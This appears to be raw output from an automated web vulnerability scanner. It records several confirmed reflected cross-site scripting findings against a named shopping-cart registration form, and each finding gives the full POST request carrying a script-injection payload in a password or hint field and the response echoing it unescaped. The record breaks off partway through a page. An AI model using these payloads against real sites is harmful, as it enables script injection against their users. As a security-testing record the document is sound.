Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:03 GMT
Content-Length: 12519
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords do not match each other, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x0001D8)</script>">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST '"--></style></script><script>alert(0x0001D9)</script>
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001D9)%3c%2fscript%3e&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:07 GMT
Content-Length: 12519
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords do not match each other, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x0001D9)</script>">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST '"--></style></script><script>alert(0x0001DA)</script>
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001DA)%3c%2fscript%3e&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:42:10 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x0001DA)</script>">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country" selected>Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1">Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7" Selected></option>

</select>
</td>
</tr>
</table>
